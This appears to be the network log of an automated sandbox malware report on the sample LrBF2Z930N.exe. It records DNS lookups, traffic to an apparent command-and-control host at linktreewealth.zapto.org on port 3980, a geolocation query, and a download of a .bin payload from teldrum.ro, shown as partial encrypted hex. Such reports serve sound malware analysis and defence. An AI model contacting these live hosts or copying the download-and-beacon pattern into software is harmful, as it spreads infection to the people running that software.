                                                                                    Jan 14, 2025 15:32:18.062330961 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.062334061 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.062346935 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.062350035 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.062361002 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.062374115 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.062386036 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.062406063 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.062421083 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.062421083 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.062475920 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.062644005 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.062664032 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.062680960 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.062695980 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.062711000 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.062716961 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.062726974 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.062740088 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.062764883 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.062808037 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.443557024 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.443588972 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.443603039 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.443615913 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.443628073 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.443640947 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.443654060 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.443654060 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.443667889 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.443689108 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.443702936 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.443720102 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.443743944 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.443749905 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.443763018 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.443775892 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.443789959 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.443814993 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.443835974 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.443866014 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.443969011 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.443985939 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.443998098 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444010973 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444015026 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444024086 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444040060 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444045067 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444058895 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444071054 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444075108 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444084883 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444097996 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444103003 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444112062 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444123983 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444137096 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444145918 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444152117 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444164038 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444178104 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444191933 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444200039 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444219112 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444219112 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444232941 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444245100 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444257021 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444257975 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444273949 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444283962 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444308043 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444344044 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444355965 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444367886 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444399118 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444410086 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444422960 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444436073 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444454908 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444461107 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444469929 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444483995 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444483995 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444508076 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444689035 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444701910 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444714069 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444725037 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444730997 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444739103 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444751978 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444757938 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444765091 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444780111 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444806099 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444813967 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444825888 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444837093 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444855928 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444861889 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444863081 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444869995 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444876909 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444888115 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444896936 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444902897 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444907904 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:18.444926977 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444941044 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:18.444973946 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:21.386769056 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:21.391834974 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:21.391854048 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:21.391858101 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:21.391868114 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:21.391879082 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:21.391886950 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:21.391906023 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:21.391963959 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:21.391993999 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:21.391995907 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:21.392004967 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:21.392040968 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:21.396791935 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:21.396904945 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:21.396915913 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:21.397018909 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:21.397030115 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:21.397128105 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:21.397138119 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:21.479285955 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:21.484850883 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:21.484955072 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:45.357743979 CET39806163243.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:45.360258102 CET616323980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:45.365144968 CET39806163243.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:33:15.365206957 CET39806163243.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:33:15.367435932 CET616323980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:33:15.372184992 CET39806163243.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:33:36.951356888 CET39806163243.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:33:37.095285892 CET616323980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:33:41.293220997 CET616323980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:33:41.293596029 CET6163480192.168.2.5178.237.33.50
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 14, 2025 15:30:12.244343042 CET5357990162.159.36.2192.168.2.5
                                                                                    Jan 14, 2025 15:30:12.781863928 CET5412053192.168.2.51.1.1.1
                                                                                    Jan 14, 2025 15:30:12.789113998 CET53541201.1.1.1192.168.2.5
                                                                                    Jan 14, 2025 15:32:05.694335938 CET6062953192.168.2.51.1.1.1
                                                                                    Jan 14, 2025 15:32:05.773442984 CET53606291.1.1.1192.168.2.5
                                                                                    Jan 14, 2025 15:32:12.726346016 CET4961653192.168.2.51.1.1.1
                                                                                    Jan 14, 2025 15:32:12.735357046 CET53496161.1.1.1192.168.2.5
                                                                                    Jan 14, 2025 15:32:14.761765003 CET5717053192.168.2.51.1.1.1
                                                                                    Jan 14, 2025 15:32:14.770092964 CET53571701.1.1.1192.168.2.5
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Jan 14, 2025 15:30:12.781863928 CET192.168.2.51.1.1.10x190aStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                    Jan 14, 2025 15:32:05.694335938 CET192.168.2.51.1.1.10x4811Standard query (0)teldrum.roA (IP address)IN (0x0001)false
                                                                                    Jan 14, 2025 15:32:12.726346016 CET192.168.2.51.1.1.10x34daStandard query (0)linktreewealth.zapto.orgA (IP address)IN (0x0001)false
                                                                                    Jan 14, 2025 15:32:14.761765003 CET192.168.2.51.1.1.10x474dStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Jan 14, 2025 15:30:12.789113998 CET1.1.1.1192.168.2.50x190aName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                    Jan 14, 2025 15:32:05.773442984 CET1.1.1.1192.168.2.50x4811No error (0)teldrum.ro109.99.162.14A (IP address)IN (0x0001)false
                                                                                    Jan 14, 2025 15:32:12.735357046 CET1.1.1.1192.168.2.50x34daNo error (0)linktreewealth.zapto.org43.226.229.209A (IP address)IN (0x0001)false
                                                                                    Jan 14, 2025 15:32:14.770092964 CET1.1.1.1192.168.2.50x474dNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                    • teldrum.ro
                                                                                    • geoplugin.net
                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.561634178.237.33.5080516C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 14, 2025 15:32:14.777337074 CET71OUTGET /json.gp HTTP/1.1
                                                                                    Host: geoplugin.net
                                                                                    Cache-Control: no-cache
                                                                                    Jan 14, 2025 15:32:15.422454119 CET1171INHTTP/1.1 200 OK
                                                                                    date: Tue, 14 Jan 2025 14:32:15 GMT
                                                                                    server: Apache
                                                                                    content-length: 963
                                                                                    content-type: application/json; charset=utf-8
                                                                                    cache-control: public, max-age=300
                                                                                    access-control-allow-origin: *
                                                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                    Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7126", "geoplugin_longitude":"-74.0066", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.561631109.99.162.14443516C:\Users\user\Desktop\LrBF2Z930N.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-14 14:32:06 UTC173OUTGET /NJrdZqNcCtz102.bin HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                    Host: teldrum.ro
                                                                                    Cache-Control: no-cache
                                                                                    2025-01-14 14:32:07 UTC223INHTTP/1.1 200 OK
                                                                                    Date: Tue, 14 Jan 2025 14:32:06 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Mon, 13 Jan 2025 20:36:39 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 493632
                                                                                    Connection: close
                                                                                    Content-Type: application/octet-stream
                                                                                    2025-01-14 14:32:07 UTC7969INData Raw: 7c cd 41 88 f3 aa b9 07 43 9f e2 63 1a 47 c0 99 31 f6 fb dd 98 80 55 65 a7 3c 37 0d 1d c9 47 fe 3b 7b 83 83 8b 95 f6 6d 84 04 cf 6b 56 6c 14 ef e6 62 6a 1b 24 de 29 fd 65 9d da 35 73 99 e0 3b e3 64 d9 d6 0b 86 83 14 68 d8 e0 b2 71 08 bb eb 3f b2 62 d1 c7 75 5f 29 f3 08 48 8e 63 dd b2 49 43 5d 51 bf b9 8a 67 bc bc 96 79 ae f3 18 ed fb c1 77 64 3d 94 2f ed 87 5d 08 71 1e ac 12 a9 4f 7e f6 2b bc 12 74 fb 4f d2 b0 1b 55 d7 e6 5a 1b ee ab 6e 5a bf 78 48 59 e7 8c b6 10 26 c5 e7 f3 13 33 03 d8 c0 69 ac 98 f1 0c 97 0f 65 30 a8 48 cf 5a f1 85 13 86 2b 0e 4c 0b 2a f8 12 3d cd 6d d1 d5 8e 28 37 d4 0c 7a 57 8e 4f 0f 20 d0 03 36 e7 ef 39 b3 65 fb 8e eb 51 8b 00 6c e4 24 1e 3b e1 f0 e7 99 2f 1f 74 43 d5 8d 49 43 6a 86 fa 0d 53 43 da 6a 0d 59 35 99 86 b3 4c 7d 52 02 d1
                                                                                    Data Ascii: |ACcG1Ue<7G;{mkVlbj$)e5s;dhq?bu_)HcIC]Qgywd=/]qO~+tOUZnZxHY&3ie0HZ+L*=m(7zWO 69eQl$;/tCICjSCjY5L}R
                                                                                    2025-01-14 14:32:07 UTC8000INData Raw: 14 7f ba 45 09 92 32 0f ea 33 6d d8 1a 88 94 cd 80 d9 de 78 1c 70 47 04 b3 85 ac 5c c4 03 ff 34 19 85 30 5a 54 a9 fc 6f f4 f5 4e 6c ab c8 ed 80 c3 51 93 da 8f 94 b5 96 ef 0d 3c 87 f0 60 c8 d0 72 ed 77 b1 ba 93 a2 bd a9 e7 c4 16 88 34 03 a0 68 16 25 bd 91 6a 01 6b ce d5 68 fa 35 f0 34 47 02 c0 86 37 e3 db 86 a7 f6 1b ea 4c 22 e1 9c ec dc 2f 0b 5c db fe 86 9c a2 3f 12 ec 92 13 7c 9d 90 4a 66 cd 42 d6 99 ca 08 a1 bd 46 6d 96 6e 7b 1d 6e 6f 92 22 af 5d 14 fc 39 99 cd 0d 7a a1 3e db 3d 2d e6 9d a0 aa 53 e8 7f 27 06 79 35 41 35 6d b3 49 68 8c 71 17 2f 03 99 00 3a c3 94 18 70 b8 f2 d5 33 13 bd 41 77 71 f9 37 31 ac 06 9c 5b 65 1c 03 7b fd 5d aa 1b db 42 96 69 e1 81 f8 e2 75 ec 13 a3 cb 8a 04 1a 10 d8 55 03 e9 f8 eb 66 56 7b f5 da cd 49 08 03 4c d6 ff cc c6 31 ca
                                                                                    Data Ascii: E23mxpG\40ZToNlQ<`rw4h%jkh54G7L"/\?|JfBFmn{no"]9z>=-S'y5A5mIhq/:p3Awq71[e{]BiuUfV{IL1
                                                                                    2025-01-14 14:32:07 UTC8000INData Raw: 1d 99 73 43 23 e8 b2 91 f3 06 0d a9 1d 75 98 f2 f3 8c 70 3a 7b 6b ef b1 8a e6 f5 13 19 7c b8 59 2d 4e 0c 0d d7 06 be 96 e0 6c 06 51 10 83 80 75 2c a1 13 99 ef 74 59 fb 19 54 8c d2 c1 15 c5 93 b3 b2 85 88 d2 fc bf 72 e5 bb 88 20 3a e4 b7 d6 00 91 c5 d9 7d 6f 91 1a 7f dd 13 84 10 2a 40 be 17 88 53 a7 f7 a2 b6 0e 28 cd c9 e7 d6 df 0c 29 2d 01 49 e3 c1 eb 6d 4c 9d 70 41 c5 64 eb b1 45 23 fc 63 49 c9 84 44 9a 92 d0 0d 51 ed 19 11 e6 c2 80 89 4d f9 bb 50 c4 19 66 92 aa e8 e2 87 2b 1a 4b f7 92 6d 70 f3 5d 91 89 33 22 10 24 55 c3 70 f3 9a c5 b7 fd c1 a9 49 6b f8 d0 db bd d4 36 45 f6 5f db 79 8d ca aa 9c a4 27 9e 85 97 63 f9 8b 23 7a 00 8d fe 2d 22 33 e8 26 d1 9f 4b ec f4 ce 5b c8 a3 d1 64 3e 65 4e f7 7a 30 22 f8 20 fd e6 7e 33 85 54 c9 df 40 16 5e 1c 2a ec 15 64
                                                                                    Data Ascii: sC#up:{k|Y-NlQu,tYTr :}o*@S()-ImLpAdE#cIDQMPf+Kmp]3"$UpIk6E_y'c#z-"3&K[d>eNz0" ~3T@^*d
                                                                                    2025-01-14 14:32:07 UTC8000INData Raw: e3 20 b1 06 5b 94 71 65 e9 ba 28 b3 50 80 36 e6 26 4b b4 36 a0 ab 64 ff 63 32 8e d4 61 bc b7 dd 4f 9d 09 da 48 ea 83 1b 49 74 33 ad 32 6b 05 69 b1 61 8c 07 ba 74 57 ff 19 5d 5b f0 bc 27 06 89 42 d9 e2 88 b0 eb 05 36 57 d5 0e fe 56 b7 d3 86 2c ef 87 bc 5a 1b ac be 8b 44 1f ae 0d 28 7a fe de 66 1c 85 65 92 9b 86 a0 9c f9 7d 2b 42 b0 d8 f1 d8 30 bb d6 a8 98 05 5e 39 f4 e0 e5 25 7f d8 e4 c4 82 3a b5 64 81 35 78 85 d6 c6 d1 0b 74 4c 0b 26 6e 51 03 2a f0 f7 2b 8d 80 7f 0b 24 ff 65 7c 37 d9 7a c1 b0 4b 1c 69 4d 0f 92 3c c5 c7 71 f9 fe fa d5 5d b2 65 33 7c 50 74 61 78 51 6f db f3 5b 2d 1b 2e e5 13 67 71 c7 72 80 f6 c4 36 aa 40 dd d2 35 80 a9 ec fd dd e8 94 93 c3 32 bf 77 c3 e6 af df d7 e0 74 6f ef 9c d1 1c c7 8d 02 3b 6b 28 22 41 19 25 cb 6b aa e4 28 4e 27 64 a1
                                                                                    Data Ascii: [qe(P6&K6dc2aOHIt32kiatW]['B6WV,ZD(zfe}+B0^9%:d5xtL&nQ*+$e|7zKiM<q]e3|PtaxQo[-.gqr6@52wto;k("A%k(N'd
                                                                                    2025-01-14 14:32:07 UTC8000INData Raw: 7f 8d df 74 cd 00 10 39 15 3c 84 c7 84 9c 29 2b 11 22 45 b2 31 27 5f 50 be 5b 34 ef 2b dc be 71 9a e5 60 bf b3 2c 9b 42 9f 6c 58 03 a8 89 65 22 b0 b9 a3 f9 29 f7 93 6c bb 4d 57 b2 09 d6 9e 99 aa e4 ba e5 30 55 99 4e d8 84 28 7f d0 6d 53 c5 b5 18 e7 c7 67 fa 38 fb dd 6d 03 6d 18 ba fe 2b 42 14 24 60 9e 1e ed a2 c6 82 2d 21 22 0b e9 65 b3 30 55 0b 23 72 ed 23 ba f7 be c1 7c 4b 91 dd 2f 5c ec 66 cc 00 ee c2 22 48 70 5f e1 0b 7f 9b 1d f9 ba 1b a4 a2 f6 cc 26 9d 4e 04 fd 30 91 bc bc 20 d6 f7 e8 69 b1 a5 a3 2d d5 62 0c 7b d7 74 a9 b6 36 35 37 6f 15 7d e0 9e 3c 09 bd 6a 5c 16 15 1f e4 25 ee 4e 4c 39 62 06 3d 40 ac 9e 66 9a 75 bf b9 a4 9c a9 19 f1 9d 30 b8 69 a7 79 ae 14 f8 72 1b 49 a7 94 0e 3d a1 78 f6 75 ec 65 ae 79 4d 19 f3 6c c0 f2 b7 a8 2d 93 b4 c6 b8 f8 09
                                                                                    Data Ascii: t9<)+"E1'_P[4+q`,BlXe")lMW0UN(mSg8mm+B$`-!"e0U#r#|K/\f"Hp_&N0 i-b{t657o}<j\%NL9b=@fu0iyrI=xueyMl-
                                                                                    2025-01-14 14:32:07 UTC8000INData Raw: 56 98 2e 6e 4e b8 92 f3 84 a4 48 f2 82 26 98 03 e0 19 59 53 59 0e 60 85 86 7f b2 d6 f2 3b 40 28 65 7a b5 15 bf 06 d9 09 a2 8b 2d 09 68 ea cb 01 ed 5a 40 f2 4b 75 b2 da e7 a4 ec a3 35 46 65 ba df d9 75 0e 75 9f ae b3 04 3e e0 3c f5 eb 93 5b 0c aa 05 3b ec 03 ac c5 9d 2e 44 99 47 a2 7f 60 1c ea 25 dd 5a 55 34 a2 ae 57 fb 8a 66 bc 3f 52 49 68 b5 51 ed 7b bf 3d 64 48 84 ac d3 87 29 03 8e 28 5b 06 39 cc 35 e9 12 94 12 70 f3 69 f1 3a da 46 44 0e cd 26 0c 34 cd c6 8d 41 78 a6 c3 11 1d 8a 17 54 9c 40 e5 56 61 30 a5 13 63 ee bd 23 f9 47 a5 14 bd 68 f2 b8 d8 20 d5 b6 2e 04 68 52 a1 28 9f 70 15 85 09 7c c6 73 d6 cc 58 c0 e7 2e f5 8d 67 67 57 8c 33 d3 47 31 31 4c da 51 9d b7 64 ee 08 93 4a 81 e5 cc e7 14 76 a8 20 b0 21 d9 14 b4 d3 9e cb 38 74 a8 c4 c4 b8 a6 a1 92 e7
                                                                                    Data Ascii: V.nNH&YSY`;@(ez-hZ@Ku5Feuu><[;.DG`%ZU4Wf?RIhQ{=dH)([95pi:FD&4AxT@Va0c#Gh .hR(p|sX.ggW3G11LQdJv !8t
